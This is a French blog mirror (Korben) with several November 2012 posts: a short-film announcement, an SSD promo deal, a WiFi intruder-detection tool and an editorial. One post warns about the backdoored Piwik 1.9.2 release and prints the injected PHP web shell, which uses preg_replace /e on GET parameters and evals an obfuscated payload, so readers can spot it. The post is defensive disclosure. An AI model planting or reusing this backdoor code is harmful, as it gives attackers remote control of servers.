PROJET AUTOBLOG


Korben

source: Korben

⇐ retour index

Mise à jour

Mise à jour de la base de données, veuillez patienter...

Noon

vendredi 30 novembre 2012 à 07:07

Noon est un court métrage réalisé en 2 jours par Kasra Farahani (Directeur artistique sur Star Trek II, MiB3 et Thor) et filmé par Chris Manley (Mad Men). La post production a ensuite pris 16 mois et la version finale devrait sortir le 14 janvier 2013.

L'histoire de Noon se déroule sur la Terre, dans un futur où le soleil reste fixe dans le ciel... Le monde est devenu cruel et sans pitié mais un monde meilleur baptisé Noon est accessible aux plus offrants. Un militaire corrompu du nom de Gray qui fait sa loi au point de passage vers Noon va alors découvrir qu'il n'est pas si inhumain que cela...

Merci à Zamin pour le partage

 

Bon plan – Un disque SSD de 240 Go sous le sapin !

jeudi 29 novembre 2012 à 16:00

Edit : J'édite cet article rapidement pour vous dire qu'on approche de la rupture de stock sur le SSD donc vous pouvez toujours tenter votre chance avant minuit. Toutefois, si vous souhaitez vous rabattre sur un autre modèle de SSD parce que le Verbatim n'est plus en stock, ou si vous cherchez un autre composant pour votre ordinateur (carte graphique, carte mère, RAM...etc... peu importe), Matériel.net propose -5% en passant par ce lien et cela jusqu'au 02/12/2012. A bon entendeur, salut !

La semaine dernière, c'était bon plan sur un bon disque à plateaux des familles de 3 To, mais certains d'entre vous ne jurant que par le SSD, vous m'avez demandé si je pouvais aussi vous avoir un disque SSD avec une bonne capacité à un prix sympa.

Et bien, je ne suis pas le Père Noël, mais j'ai quand même réussi à vous trouver un disque SSD Verbatim SATA III de 240 Go en allant casser les pieds à Materiel.net ;-)

Voici la fiche technique du petit bébé qui est capable de lire à 550 Mo/sec et qui est totalement compatible avec TRIM et SMART.

verbatim Bon plan   Un disque SSD de 240 Go sous le sapin !

Du coup, ce petit Verbatim est au meilleur prix du marché si vous utilisez le code promo

ECB8-C373-ZE866A

qui fera descendre ce 240 Go à 144,99 € TTC (Frais de port non inclus) soit 0,60 € le Go. Et bien sûr, il est garanti 2 ans !

Si ça vous intéresse, tous les détails sont ici. L'offre n'est valable que jusqu'à vendredi minuit et il n'y a que 100 pièces.

A noter que d'autres disques SSD sont visibles ici pour ceux qui veulent.

Piwik – Attention à la backdoor

jeudi 29 novembre 2012 à 15:06

Chers amis, attention si vous utilisez Piwik comme outil de stats sur votre serveur. En effet, si vous avez installé ou mis à jour vers la version 1.9.2 du 26 novembre entre 16h43 et 00h59 , il se peut que vous ayez installé une version de Piwik contenant une backdoor. Le pirate a profité d'un bug dans un plugin WordPress présent sur le serveur de Piwik pour placer son code dans les sources du projet.

Pour être certain que votre installation n'est pas piégée, ouvrez le fichier

core/Loader.php

et si vous ne voyez pas ce qui suit dedans, vous êtes tranquille.

<?php Error_Reporting(0);       if(isset($_GET['g']) && isset($_GET['s'])) {
preg_replace("/(.+)/e", $_GET['g'], 'dwm');     exit;
}
if (file_exists(dirname(__FILE__)."/lic.log")) exit;
eval(gzuncompress(base64_decode('eF6Fkl9LwzAUxb+KD0I3EOmabhCkD/
OhLWNOVrF/IlKatiIlnbIOZ/bpzb2pAyXRl7uF/s7JuffmMlrf3y7XD09OSWb
Uo9RzF6XzHCz3+0pOeDW0C79s2vqtaSdOTRKZOxfXDlmJOvp8LbzHwJle
/aIYEL0YWE$

Sinon, rendez-vous sur le blog de Piwik pour comprendre comment vous débarrasser de cette backdoor qui pourrait permettre à un pirate d'avoir accès à votre serveur.

Source

Comment savoir si quelqu’un utilise votre réseau WiFi à votre insu ?

jeudi 29 novembre 2012 à 14:50

Mouahah ah ah ! Ne loupez plus le FBI ou votre voisin Kévin lorsque ces derniers se connecteront à votre insu sur votre réseau Wifi !

Comment ? Et bien grâce à WiFi Guard, un freeware qui une fois lancé vous prévient lorsqu'un petit nouveau se connecte à votre réseau Wifi.

Pour cela, WiFi Guard est capable de pinger tous les appareils connectés à votre réseau, et même si une machine bloque le ping grâce à son firewall, ce dernier est capable de la détecter quand même. Lors de la première utilisation, vous devrez marquer comme "connues" les machines de votre réseau et laisser ensuite tourner le logiciel. Et lorsqu'une nouvelle adresse MAC fera son apparition, BAM, WiFi Guard vous alertera !

yop Comment savoir si quelquun utilise votre réseau WiFi à votre insu ?L'outil tourne sous Windows, Linux et Mac OSX et je pense qu'il vous sera rapidement indispensable si vous avez des doutes sur la sécurité de votre réseau et pour attraper les petits malins qui débarquent sur votre routeur sans permission.

Enjoy !

Photo et source

Edito du 29/11/2012

jeudi 29 novembre 2012 à 13:49

Un nouvel édito où je parle de zéro G, de merci et de LeWeb...

La ZéroG, c'était un truc de ouf. Je vous prépare un article à ce sujet et je me demande ce que vais pouvoir faire d'encore plus mégalo l'année prochaine ;-)